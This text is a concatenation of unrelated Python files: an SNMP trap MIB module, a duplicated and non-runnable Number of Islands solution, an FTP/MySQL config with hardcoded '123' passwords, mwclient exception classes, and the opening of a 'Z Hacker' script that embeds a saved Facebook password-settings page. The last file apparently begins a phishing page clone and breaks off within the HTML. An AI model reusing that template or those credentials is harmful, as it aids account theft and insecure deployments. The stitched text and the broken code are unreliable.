rbtwsApOperRadioStatusTrap3.') rbtwsMichaelMICFailure = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 61)).setObjects(("RBTWS-TRAP-MIB", "rbtwsApNum"), ("RBTWS-TRAP-MIB", "rbtwsAPRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsRadioMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsMichaelMICFailureCause"), ("RBTWS-TRAP-MIB", "rbtwsClientMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsClientMACAddress2")) if mibBuilder.loadTexts: rbtwsMichaelMICFailure.setStatus('current') if mibBuilder.loadTexts: rbtwsMichaelMICFailure.setDescription('Two Michael MIC failures were seen within 60 seconds of each other. Object rbtwsClientMACAddress indicates the source of the first failure, and object rbtwsClientMACAddress2 indicates the source of the second failure. Service is interrupted for 60 seconds on the radio due to TKIP countermeasures having commenced. The radio is identified by rbtwsApNum and rbtwsAPRadioNum. An alternative way to identify the radio is rbtwsRadioMACAddress. Obsoletes rbtwsMpMichaelMICFailure and rbtwsMpMichaelMICFailure2.') rbtwsClientAuthorizationSuccessTrap3 = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 62)).setObjects(("RBTWS-TRAP-MIB", "rbtwsUserName"), ("RBTWS-TRAP-MIB", "rbtwsClientSessionId"), ("RBTWS-TRAP-MIB", "rbtwsClientMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsClientIp"), ("RBTWS-TRAP-MIB", "rbtwsClientVLANName"), ("RBTWS-TRAP-MIB", "rbtwsClientSessionState"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthServerIp"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthenProtocolType"), ("RBTWS-TRAP-MIB", "rbtwsClientAccessMode"), ("RBTWS-TRAP-MIB", "rbtwsPhysPortNum"), ("RBTWS-TRAP-MIB", "rbtwsApNum"), ("RBTWS-TRAP-MIB", "rbtwsAPRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsRadioSSID"), ("RBTWS-TRAP-MIB", "rbtwsUserAccessType"), ("RBTWS-TRAP-MIB", "rbtwsLocalId"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthorizationReason")) if mibBuilder.loadTexts: rbtwsClientAuthorizationSuccessTrap3.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsClientAuthorizationSuccessTrap3.setDescription("This trap is sent when a client authorizes. If rbtwsClientAccessMode = 'ap': rbtwsApNum, rbtwsAPRadioNum, rbtwsRadioSSID identify the AP/radio/BSS providing wireless service to this client at the time this trap was sent. If rbtwsClientAccessMode = 'wired': rbtwsPhysPortNum identifies the physical port on the AC used by this wired-auth client. Obsoleted by rbtwsClientAuthorizationSuccessTrap4.") rbtwsApManagerChangeTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 63)).setObjects(("RBTWS-TRAP-MIB", "rbtwsDeviceSerNum"), ("RBTWS-TRAP-MIB", "rbtwsAPMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsApNum"), ("RBTWS-TRAP-MIB", "rbtwsApName"), ("RBTWS-TRAP-MIB", "rbtwsApMgrOldIp"), ("RBTWS-TRAP-MIB", "rbtwsApMgrNewIp"), ("RBTWS-TRAP-MIB", "rbtwsApMgrChangeReason")) if mibBuilder.loadTexts: rbtwsApManagerChangeTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsApManagerChangeTrap.setDescription("This trap is sent when the AP's secondary link becomes its primary link.") rbtwsClientClearedTrap2 = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 64)).setObjects(("RBTWS-TRAP-MIB", "rbtwsUserName"), ("RBTWS-TRAP-MIB", "rbtwsClientSessionId"), ("RBTWS-TRAP-MIB", "rbtwsClientMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsClientIp"), ("RBTWS-TRAP-MIB", "rbtwsClientAccessMode"), ("RBTWS-TRAP-MIB", "rbtwsPhysPortNum"), ("RBTWS-TRAP-MIB", "rbtwsApNum"), ("RBTWS-TRAP-MIB", "rbtwsAPRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsRadioSSID"), ("RBTWS-TRAP-MIB", "rbtwsClientSessionElapsedSeconds"), ("RBTWS-TRAP-MIB", "rbtwsLocalId"), ("RBTWS-TRAP-MIB", "rbtwsClientClearedReason")) if mibBuilder.loadTexts: rbtwsClientClearedTrap2.setStatus('current') if mibBuilder.loadTexts: rbtwsClientClearedTrap2.setDescription('This trap is sent when a client session is cleared. Obsoletes rbtwsClientClearedTrap.') rbtwsMobilityDomainResiliencyStatusTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 65)).setObjects(("RBTWS-TRAP-MIB", "rbtwsMobilityDomainResiliencyStatus")) if mibBuilder.loadTexts: rbtwsMobilityDomainResiliencyStatusTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsMobilityDomainResiliencyStatusTrap.setDescription('This trap is sent by a mobility domain seed to announce changes in resilient capacity status.') rbtwsApOperRadioStatusTrap3 = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 66)).setObjects(("RBTWS-TRAP-MIB", "rbtwsDeviceSerNum"), ("RBTWS-TRAP-MIB", "rbtwsApNum"), ("RBTWS-TRAP-MIB", "rbtwsApName"), ("RBTWS-TRAP-MIB", "rbtwsAPRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsRadioMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsRadioType"), ("RBTWS-TRAP-MIB", "rbtwsRadioMode"), ("RBTWS-TRAP-MIB", "rbtwsRadioConfigState"), ("RBTWS-TRAP-MIB", "rbtwsRadioChannelWidth"), ("RBTWS-TRAP-MIB", "rbtwsRadioMimoState"), ("RBTWS-TRAP-MIB", "rbtwsApConnectSecurityType"), ("RBTWS-TRAP-MIB", "rbtwsApServiceAvailability")) if mibBuilder.loadTexts: rbtwsApOperRadioStatusTrap3.setStatus('current') if mibBuilder.loadTexts: rbtwsApOperRadioStatusTrap3.setDescription('This trap is sent when the Radio changes state. It also contains aggregate information about the AP in operational state - security level and service availability. Obsoletes rbtwsApOperRadioStatusTrap and rbtwsApOperRadioStatusTrap2.') rbtwsClientAuthorizationSuccessTrap4 = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 67)).setObjects(("RBTWS-TRAP-MIB", "rbtwsUserName"), ("RBTWS-TRAP-MIB", "rbtwsClientSessionId"), ("RBTWS-TRAP-MIB", "rbtwsClientMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsClientIp"), ("RBTWS-TRAP-MIB", "rbtwsClientVLANName"), ("RBTWS-TRAP-MIB", "rbtwsClientSessionState"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthServerIp"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthenProtocolType"), ("RBTWS-TRAP-MIB", "rbtwsClientAccessMode"), ("RBTWS-TRAP-MIB", "rbtwsPhysPortNum"), ("RBTWS-TRAP-MIB", "rbtwsApNum"), ("RBTWS-TRAP-MIB", "rbtwsAPRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsRadioSSID"), ("RBTWS-TRAP-MIB", "rbtwsClientRadioType"), ("RBTWS-TRAP-MIB", "rbtwsUserAccessType"), ("RBTWS-TRAP-MIB", "rbtwsLocalId"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthorizationReason")) if mibBuilder.loadTexts: rbtwsClientAuthorizationSuccessTrap4.setStatus('current') if mibBuilder.loadTexts: rbtwsClientAuthorizationSuccessTrap4.setDescription("This trap is sent when a client authorizes. If rbtwsClientAccessMode = 'ap': rbtwsApNum, rbtwsAPRadioNum, rbtwsRadioSSID identify the AP/radio/BSS providing wireless service to this client at the time this trap was sent; rbtwsClientRadioType gives the type of radio used by this client. If rbtwsClientAccessMode = 'wired': rbtwsPhysPortNum identifies the physical port on the AC used by this wired-auth client. Obsoletes rbtwsClientAuthorizationSuccessTrap, rbtwsClientAuthorizationSuccessTrap2, rbtwsClientAuthorizationSuccessTrap3.") rbtwsRFDetectRogueDeviceTrap2 = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 68)).setObjects(("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrMacAddr"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrRadioType"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrCryptoType"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectListenerListInfo"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectClassificationReason")) if mibBuilder.loadTexts: rbtwsRFDetectRogueDeviceTrap2.setStatus('current') if mibBuilder.loadTexts: rbtwsRFDetectRogueDeviceTrap2.setDescription('This trap is sent when RF detection finds a rogue device. rbtwsRFDetectXmtrMacAddr is the radio MAC address from the beacon. rbtwsRFDetectXmtrRadioType indicates the Type of Radio used by the transmitter (rogue device). rbtwsRFDetectXmtrCryptoType indicates the Type of Crypto used by the transmitter (rogue device). rbtwsRFDetectListenerListInfo is a display string of a list of listener information. rbtwsRFDetectClassificationReason indicates the reason why the device is classified as rogue. Obsoletes rbtwsRFDetectRogueAPTrap, rbtwsRFDetectUnAuthorizedAPTrap, rbtwsRFDetectRogueDeviceTrap.') rbtwsRFDetectSuspectDeviceTrap2 = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 69)).setObjects(("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrMacAddr"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrRadioType"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrCryptoType"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectListenerListInfo"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectClassificationReason")) if mibBuilder.loadTexts: rbtwsRFDetectSuspectDeviceTrap2.setStatus('current') if mibBuilder.loadTexts: rbtwsRFDetectSuspectDeviceTrap2.setDescription('This trap is sent when RF detection finds a suspect device. rbtwsRFDetectXmtrMacAddr is the radio MAC address from the beacon. rbtwsRFDetectXmtrRadioType indicates the Type of Radio used by the transmitter (suspect device). rbtwsRFDetectXmtrCryptoType indicates the Type of Crypto used by the transmitter (suspect device). rbtwsRFDetectListenerListInfo is a display string of a list of listener information. rbtwsRFDetectClassificationReason indicates the reason why the device is classified as suspect. Obsoletes rbtwsRFDetectInterferingRogueAPTrap, rbtwsRFDetectSuspectDeviceTrap.') rbtwsClusterFailureTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 70)).setObjects(("RBTWS-TRAP-MIB", "rbtwsClusterFailureReason"), ("RBTWS-TRAP-MIB", "rbtwsClusterFailureDescription")) if mibBuilder.loadTexts: rbtwsClusterFailureTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsClusterFailureTrap.setDescription("This trap is sent when the cluster configuration failed to apply. If rbtwsClusterFailureReason = 'validation-error': The validation error is reported by the receiving end of the configuration updates. The receiving end can be any AC (switch) in the mobility domain: member, secondary seed or primary seed. - Primary seed will be the receiving end of configuration updates when Primary seed is joining the cluster and Secondary seed has preempt mode enabled. - Both Secondary seed and member will be at the receiving end when Primary seed is active.") mibBuilder.exportSymbols("RBTWS-TRAP-MIB", RbtwsUserAttributeList=RbtwsUserAttributeList, rbtwsMobilityDomainJoinTrap=rbtwsMobilityDomainJoinTrap, rbtwsAutoTuneRadioPowerChangeTrap=rbtwsAutoTuneRadioPowerChangeTrap, rbtwsClientAuthorizationSuccessTrap4=rbtwsClientAuthorizationSuccessTrap4, rbtwsMobilityDomainIp=rbtwsMobilityDomainIp, rbtwsRFDetectInterferingRogueAPTrap=rbtwsRFDetectInterferingRogueAPTrap, rbtwsDeviceId=rbtwsDeviceId, rbtwsPoEFailTrap=rbtwsPoEFailTrap, rbtwsClientRoamedFromPortNum=rbtwsClientRoamedFromPortNum, rbtwsConfigSaveInitiatorIp=rbtwsConfigSaveInitiatorIp, rbtwsRFDetectDoSTrap=rbtwsRFDetectDoSTrap, rbtwsConfigurationSavedTrap=rbtwsConfigurationSavedTrap, rbtwsMobilityDomainTimeoutTrap=rbtwsMobilityDomainTimeoutTrap, rbtwsCounterMeasureStartTrap=rbtwsCounterMeasureStartTrap, RbtwsSessionDisconnectType=RbtwsSessionDisconnectType, PYSNMP_MODULE_ID=rbtwsTrapMib, RbtwsRFDetectDoSType=RbtwsRFDetectDoSType, rbtwsRFDetectClientViaRogueWiredAPTrap2=rbtwsRFDetectClientViaRogueWiredAPTrap2, rbtwsCounterMeasurePerformerListInfo=rbtwsCounterMeasurePerformerListInfo, rbtwsUserAccessType=rbtwsUserAccessType, rbtwsClientClearedTrap2=rbtwsClientClearedTrap2, rbtwsClientDeAssociationTrap=rbtwsClientDeAssociationTrap, rbtwsApMgrChangeReason=rbtwsApMgrChangeReason, rbtwsRFDetectXmtrRadioType=rbtwsRFDetectXmtrRadioType, rbtwsDAPconnectWarningType=rbtwsDAPconnectWarningType, rbtwsMichaelMICFailureCause=rbtwsMichaelMICFailureCause, rbtwsRFDetectBlacklistedTrap=rbtwsRFDetectBlacklistedTrap, RbtwsClientClearedReason=RbtwsClientClearedReason, rbtwsClientRoamedFromWsIp=rbtwsClientRoamedFromWsIp, rbtwsApPortOrDapNum=rbtwsApPortOrDapNum, rbtwsSourceWsIp=rbtwsSourceWsIp, rbtwsRadioMimoState=rbtwsRadioMimoState, rbtwsRFDetectClassificationChangeTrap=rbtwsRFDetectClassificationChangeTrap, rbtwsOldChannelNum=rbtwsOldChannelNum, rbtwsClientAuthenticationFailureCause=rbtwsClientAuthenticationFailureCause, RbtwsDot1xFailureType=RbtwsDot1xFailureType, RbtwsClusterFailureReason=RbtwsClusterFailureReason, rbtwsClientSessionState=rbtwsClientSessionState, rbtwsDeviceOkayTrap=rbtwsDeviceOkayTrap, rbtwsRFDetectClientViaRogueWiredAPTrap=rbtwsRFDetectClientViaRogueWiredAPTrap, rbtwsApConnectSecurityType=rbtwsApConnectSecurityType, rbtwsConfigSaveInitiatorDetails=rbtwsConfigSaveInitiatorDetails, rbtwsRadioSSID=rbtwsRadioSSID, rbtwsConfigSaveGeneration=rbtwsConfigSaveGeneration, rbtwsClientClearedReason=rbtwsClientClearedReason, rbtwsClientFailureCause=rbtwsClientFailureCause, rbtwsRFDetectDoSPortTrap=rbtwsRFDetectDoSPortTrap, rbtwsClientDynAuthorClientIp=rbtwsClientDynAuthorClientIp, rbtwsDeviceSerNum=rbtwsDeviceSerNum, rbtwsUserName=rbtwsUserName, rbtwsRFDetectSuspectDeviceDisappearTrap=rbtwsRFDetectSuspectDeviceDisappearTrap, rbtwsClientVLANtag=rbtwsClientVLANtag, rbtwsMobilityDomainResiliencyStatus=rbtwsMobilityDomainResiliencyStatus, rbtwsChangedUserParamOldValues=rbtwsChangedUserParamOldValues, rbtwsClientVLANid=rbtwsClientVLANid, rbtwsClientAuthorizationReason=rbtwsClientAuthorizationReason, RbtwsMichaelMICFailureCause=RbtwsMichaelMICFailureCause, rbtwsRFDetectRogueDisappearTrap=rbtwsRFDetectRogueDisappearTrap, rbtwsDAPConnectWarningTrap=rbtwsDAPConnectWarningTrap, rbtwsApAttachType=rbtwsApAttachType, rbtwsConfigSaveInitiatorType=rbtwsConfigSaveInitiatorType, rbtwsClientDot1xState=rbtwsClientDot1xState, rbtwsRadioPowerChangeReason=rbtwsRadioPowerChangeReason, rbtwsChannelChangeReason=rbtwsChannelChangeReason, rbtwsClientAccessType=rbtwsClientAccessType, rbtwsRFDetectXmtrCryptoType=rbtwsRFDetectXmtrCryptoType, rbtwsDeviceFailTrap=rbtwsDeviceFailTrap, rbtwsOldPowerLevel=rbtwsOldPowerLevel, rbtwsTrapMib=rbtwsTrapMib, rbtwsMobilityDomainSecondarySeedIp=rbtwsMobilityDomainSecondarySeedIp, rbtwsClusterFailureDescription=rbtwsClusterFailureDescription, rbtwsRadioBSSID=rbtwsRadioBSSID, rbtwsClientAssociationSuccessTrap=rbtwsClientAssociationSuccessTrap, rbtwsBlacklistingCause=rbtwsBlacklistingCause, rbtwsApOperRadioStatusTrap3=rbtwsApOperRadioStatusTrap3, rbtwsClientDynAuthorChangeSuccessTrap=rbtwsClientDynAuthorChangeSuccessTrap, rbtwsClientAuthenProtocolType=rbtwsClientAuthenProtocolType, rbtwsClientDot1xFailureTrap=rbtwsClientDot1xFailureTrap, rbtwsRFDetectXmtrMacAddr=rbtwsRFDetectXmtrMacAddr, rbtwsPhysPortNum=rbtwsPhysPortNum, rbtwsRFDetectUnAuthorizedOuiTrap=rbtwsRFDetectUnAuthorizedOuiTrap, rbtwsApNonOperStatusTrap2=rbtwsApNonOperStatusTrap2, rbtwsAPMACAddress=rbtwsAPMACAddress, rbtwsChangedUserParamNewValues=rbtwsChangedUserParamNewValues, rbtwsUserParams=rbtwsUserParams, rbtwsClientAuthorizationSuccessTrap3=rbtwsClientAuthorizationSuccessTrap3, rbtwsRFDetectAdhocUserTrap=rbtwsRFDetectAdhocUserTrap, rbtwsMobilityDomainPrimarySeedIp=rbtwsMobilityDomainPrimarySeedIp, rbtwsApManagerChangeTrap=rbtwsApManagerChangeTrap, rbtwsClientRoamingTrap=rbtwsClientRoamingTrap, rbtwsRFDetectDoSType=rbtwsRFDetectDoSType, rbtwsRFDetectAdhocUserDisappearTrap=rbtwsRFDetectAdhocUserDisappearTrap, rbtwsMichaelMICFailure=rbtwsMichaelMICFailure, rbtwsTrapsV2=rbtwsTrapsV2, rbtwsRFDetectRogueDeviceTrap=rbtwsRFDetectRogueDeviceTrap, rbtwsDAPNum=rbtwsDAPNum, rbtwsMpMichaelMICFailure2=rbtwsMpMichaelMICFailure2, rbtwsRadioChannelWidth=rbtwsRadioChannelWidth, rbtwsRFDetectClientViaRogueWiredAPTrap3=rbtwsRFDetectClientViaRogueWiredAPTrap3, rbtwsAutoTuneRadioChannelChangeTrap=rbtwsAutoTuneRadioChannelChangeTrap, rbtwsNewChannelNum=rbtwsNewChannelNum, rbtwsClusterFailureTrap=rbtwsClusterFailureTrap, rbtwsClientRoamedFromDAPNum=rbtwsClientRoamedFromDAPNum, rbtwsApMgrOldIp=rbtwsApMgrOldIp, rbtwsClientAssociationFailureTrap=rbtwsClientAssociationFailureTrap, rbtwsApName=rbtwsApName, rbtwsPortNum=rbtwsPortNum, rbtwsCounterMeasureStopTrap=rbtwsCounterMeasureStopTrap, rbtwsApMgrNewIp=rbtwsApMgrNewIp, rbtwsClientRoamedFromAccessType=rbtwsClientRoamedFromAccessType, rbtwsApServiceAvailability=rbtwsApServiceAvailability, rbtwsClientIpAddrChangeReason=rbtwsClientIpAddrChangeReason, rbtwsMobilityDomainResiliencyStatusTrap=rbtwsMobilityDomainResiliencyStatusTrap, rbtwsClientAuthorizationSuccessTrap2=rbtwsClientAuthorizationSuccessTrap2, rbtwsRadioConfigState=rbtwsRadioConfigState, rbtwsClientMACAddress=rbtwsClientMACAddress, rbtwsApFailDetail=rbtwsApFailDetail, rbtwsClientDisconnectTrap=rbtwsClientDisconnectTrap, rbtwsClientDynAuthorChangeFailureTrap=rbtwsClientDynAuthorChangeFailureTrap, rbtwsClientAuthServerIp=rbtwsClientAuthServerIp, rbtwsRadioPowerChangeDescription=rbtwsRadioPowerChangeDescription, rbtwsClientAuthorizationFailureCause=rbtwsClientAuthorizationFailureCause, rbtwsRFDetectRogueDeviceDisappearTrap=rbtwsRFDetectRogueDeviceDisappearTrap, rbtwsClientAuthorizationSuccessTrap=rbtwsClientAuthorizationSuccessTrap, rbtwsClientAccessMode=rbtwsClientAccessMode, RbtwsAuthenticationFailureType=RbtwsAuthenticationFailureType, rbtwsApOperRadioStatusTrap2=rbtwsApOperRadioStatusTrap2, RbtwsAuthorizationFailureType=RbtwsAuthorizationFailureType, rbtwsClientAuthorizationFailureTrap=rbtwsClientAuthorizationFailureTrap, rbtwsRFDetectInterferingRogueDisappearTrap=rbtwsRFDetectInterferingRogueDisappearTrap, rbtwsApNonOperStatusTrap=rbtwsApNonOperStatusTrap, rbtwsRFDetectSpoofedMacAPTrap=rbtwsRFDetectSpoofedMacAPTrap, RbtwsAssociationFailureType=RbtwsAssociationFailureType, rbtwsClientLocationPolicyIndex=rbtwsClientLocationPolicyIndex, rbtwsRadioRssi=rbtwsRadioRssi, rbtwsClientIp=rbtwsClientIp, rbtwsAPAccessType=rbtwsAPAccessType, rbtwsRFDetectClassificationReason=rbtwsRFDetectClassificationReason, rbtwsRadioMACAddress=rbtwsRadioMACAddress, rbtwsRFDetectUnAuthorizedAPTrap=rbtwsRFDetectUnAuthorizedAPTrap, rbtwsRFDetectRogueAPTrap=rbtwsRFDetectRogueAPTrap, rbtwsClientSessionId=rbtwsClientSessionId, rbtwsClientDisconnectDescription=rbtwsClientDisconnectDescription, rbtwsAPRadioNum=rbtwsAPRadioNum, rbtwsNumLicensedActiveAPs=rbtwsNumLicensedActiveAPs, rbtwsMpMichaelMICFailure=rbtwsMpMichaelMICFailure, rbtwsClientRadioType=rbtwsClientRadioType, rbtwsMobilityDomainFailOverTrap=rbtwsMobilityDomainFailOverTrap, rbtwsDeviceModel=rbtwsDeviceModel, rbtwsRFDetectSuspectDeviceTrap2=rbtwsRFDetectSuspectDeviceTrap2, rbtwsRsaPubKeyFingerPrint=rbtwsRsaPubKeyFingerPrint, rbtwsClientSessionElapsedSeconds=rbtwsClientSessionElapsedSeconds, rbtwsClientTimeSinceLastRoam=rbtwsClientTimeSinceLastRoam, rbtwsRFDetectSuspectDeviceTrap=rbtwsRFDetectSuspectDeviceTrap, rbtwsLocalId=rbtwsLocalId, rbtwsClientFailureCauseDescription=rbtwsClientFailureCauseDescription, rbtwsClientDeAuthenticationTrap=rbtwsClientDeAuthenticationTrap, rbtwsNewPowerLevel=rbtwsNewPowerLevel, rbtwsClientMACAddress2=rbtwsClientMACAddress2, rbtwsApTransition=rbtwsApTransition, rbtwsClientIpAddrChangeTrap=rbtwsClientIpAddrChangeTrap, RbtwsMobilityDomainResiliencyStatus=RbtwsMobilityDomainResiliencyStatus, RbtwsClientIpAddrChangeReason=RbtwsClientIpAddrChangeReason, rbtwsClientRoamedFromRadioNum=rbtwsClientRoamedFromRadioNum, rbtwsBlacklistingRemainingTime=rbtwsBlacklistingRemainingTime, rbtwsClientAuthenticationSuccessTrap=rbtwsClientAuthenticationSuccessTrap, rbtwsRFDetectSpoofedSsidAPTrap=rbtwsRFDetectSpoofedSsidAPTrap, rbtwsClientVLANName=rbtwsClientVLANName, rbtwsClientAssociationFailureCause=rbtwsClientAssociationFailureCause, rbtwsClientSessionElapsedTime=rbtwsClientSessionElapsedTime, rbtwsRFDetectListenerListInfo=rbtwsRFDetectListenerListInfo, rbtwsClientDot1xFailureCause=rbtwsClientDot1xFailureCause, rbtwsClusterFailureReason=rbtwsClusterFailureReason, rbtwsRFDetectRogueDeviceTrap2=rbtwsRFDetectRogueDeviceTrap2, rbtwsRFDetectRogueAPMacAddr=rbtwsRFDetectRogueAPMacAddr, rbtwsClientDisconnectSource=rbtwsClientDisconnectSource, rbtwsMobilityDomainFailBackTrap=rbtwsMobilityDomainFailBackTrap, rbtwsApWasOperational=rbtwsApWasOperational, RbtwsConfigSaveInitiatorType=RbtwsConfigSaveInitiatorType, rbtwsClientAuthenticationFailureTrap=rbtwsClientAuthenticationFailureTrap, RbtwsApMgrChangeReason=RbtwsApMgrChangeReason, rbtwsClientSessionStartTime=rbtwsClientSessionStartTime, rbtwsApRejectLicenseExceededTrap=rbtwsApRejectLicenseExceededTrap, RbtwsClientAuthorizationReason=RbtwsClientAuthorizationReason, rbtwsAPBootTrap=rbtwsAPBootTrap, rbtwsConfigSaveFileName=rbtwsConfigSaveFileName, rbtwsRFDetectUnAuthorizedSsidTrap=rbtwsRFDetectUnAuthorizedSsidTrap, rbtwsApOperRadioStatusTrap=rbtwsApOperRadioStatusTrap, rbtwsRadioMode=rbtwsRadioMode, rbtwsClientClearedTrap=rbtwsClientClearedTrap, rbtwsApTimeoutTrap=rbtwsApTimeoutTrap, rbtwsApNum=rbtwsApNum, rbtwsRadioType=rbtwsRadioType, RbtwsBlacklistingCause=RbtwsBlacklistingCause)
"""433. Number of Islands""" class Solution: """ @param grid: a boolean 2D matrix @return: an integer """ def numIslands(self, grid): # write your code here ## Practice: if not grid: return 0 self.directions = [(1, 0), (-1, 0), (0, 1), (0, -1)] m = len(grid) n = len(grid[0]) visited = set() res = 0 for i in range(m): for j in range(n): if grid[i][j] == 1 and (i, j) not in visited: visited.add((i, j)) self.bfs(i, j, grid, visited) res += 1 return res def bfs(self, i, j, grid, visited): queue = collections.deque([(i, j)]) while queue: i, j = queue.popleft() for dx, dy in self.directions: x = i + dx y = j + dy if not self.isValid(x, y, grid, visited): continue visited.add((x, y)) queue.append((x, y)) def isValid(self, i, j, grid, visited): m = len(grid) n = len(grid[0]) if i < 0 or i >= m or j < 0 or j >= n or (i, j) in visited or grid[i][j] == 0: return False return True ## BFS if not grid: return 0 self.directions = [(1, 0), (0, 1), (-1, 0), (0, -1)] m = len(grid) n = len(grid[0]) islands = 0 visited = set() for i in range(m): for j in range(n): if grid[i][j] == 1 and (i, j) not in visited: self.bfs(i, j, grid, visited) islands += 1 return islands def bfs(self, i, j, grid, visited): queue = collections.deque([(i, j)]) visited.add((i, j)) while queue: x, y = queue.popleft() for x1, y1 in self.directions: newX, newY = x + x1, y + y1 if self.isValid(newX, newY, grid, visited): visited.add((newX, newY)) queue.append((newX, newY)) def isValid(self, i, j, grid, visited): m = len(grid) n = len(grid[0]) if i < 0 or i >= m or j < 0 or j >= n or (i, j) in visited or grid[i][j] == 0: return False return True ########
""" Code that changes input files and writes them back out. Useful for parameter sweeps. See Also -------- armi.reactor.converters Code that changes reactor objects at runtime. These often take longer to run than these but can be used in the middle of ARMI analyses. """
#!/usr/bin/python # -*- coding: utf-8 -*- __author__ = 'wtq' # ftp登录到的路径 FTP_PATH = "/home/wtq/" # 要连接的远程主机ip HOST = '10.108.112.74' # 远程文件的路径,相对于ftp的登录路径而言,mysql应该备份到该路径下 TARGET_DIRN = 'ftp_file/' # 要下载的目标文件名 TARGET_FILE = 'key_words.sql' # 登录的ftp用户名 USER = "wtq" # 登录的密码 PASSWD = "123" # 要下载到的本地文件地址 DOWNLOAD_FILE = "/home/wtq/ftp_file/key_words.sql" # 远程机上的mysql的配置 MYSQL_REMOTE_USER = "root" MYSQL_REMOTE_PASSWORD = "123" MYSQL_REMOTE_DATABASE = "yuqing" MYSQL_REMOTE_TABLE = "t_items" # 本地的mysql配置 MYSQL_LOCAL_USER = "root" MYSQL_LOCAL_PASSWORD = "123" MYSQL_LOCAL_DATABASE = "yuqing" MYSQL_LOCAL_TABLE = "t_items"
class MwClientError(RuntimeError): pass class MediaWikiVersionError(MwClientError): pass class APIDisabledError(MwClientError): pass class MaximumRetriesExceeded(MwClientError): pass class APIError(MwClientError): def __init__(self, code, info, kwargs): self.code = code self.info = info MwClientError.__init__(self, code, info, kwargs) class InsufficientPermission(MwClientError): pass class UserBlocked(InsufficientPermission): pass class EditError(MwClientError): pass class ProtectedPageError(EditError, InsufficientPermission): pass class FileExists(EditError): pass class LoginError(MwClientError): pass class EmailError(MwClientError): pass class NoSpecifiedEmail(EmailError): pass class NoWriteApi(MwClientError): pass class InvalidResponse(MwClientError): def __init__(self, response_text=None): self.message = 'Did not get a valid JSON response from the server. Check that ' + \ 'you used the correct hostname. If you did, the server might ' + \ 'be wrongly configured or experiencing temporary problems.' self.response_text = response_text MwClientError.__init__(self, self.message, response_text) def __str__(self): return self.message
# _\__o__ __o/ o o o o__ __o o o/ o__ __o__/_ o__ __o # v |/ <|> <|> <|> /v v\ <|> /v <| v <| v\ # / < > < > / \ /> <\ / > /> < > / \ <\ # o/ | | o/ \o o/ \o__ __o/ | \o/ o/ # /v o__/_ _\__o <|__ __|> <| |__ __| o__/_ |__ _<| # /> | | / \ \\ | \ | | \ # o/ <o> <o> o/ \o \ / <o> \o <o> <o> \o # /v | | /v v\ o o | v\ | | v\ # /> _\o__/_ / \ / \ /> <\ <\__ __/> / \ <\ / \ _\o__/_ / \ <\ # # {Follow Me Here} # # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[Author: Z Hacker]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://twitter.com/_DEF9]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://www.youtube.com/c/ZhackerL]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` #0xe1 Main_Facebook = """<!DOCTYPE html> <!-- saved from url=(0068)https://www.facebook.com/settings?tab=security&section=password&view --> <html class="sidebarMode canHaveFixedElements" id="facebook" lang="en"> <head> <meta charset="utf-8"/> <meta content="origin-when-crossorigin" id="meta_referrer" name="referrer"/> <link as="script" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3iYXl4/yt/l/en_GB/GyBZ_3rQfiS.js" rel="preload"/> <link as="script" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yP/r/v5XZFEJ_r9D.js" rel="preload"/> <link as="script" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yv/r/g18vdDu5Gvb.js" rel="preload"/> <link as="style" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yn/l/0,cross/FT1V5TAo3rQ.css" rel="preload"/> <link as="style" crossorigin="anonymous" 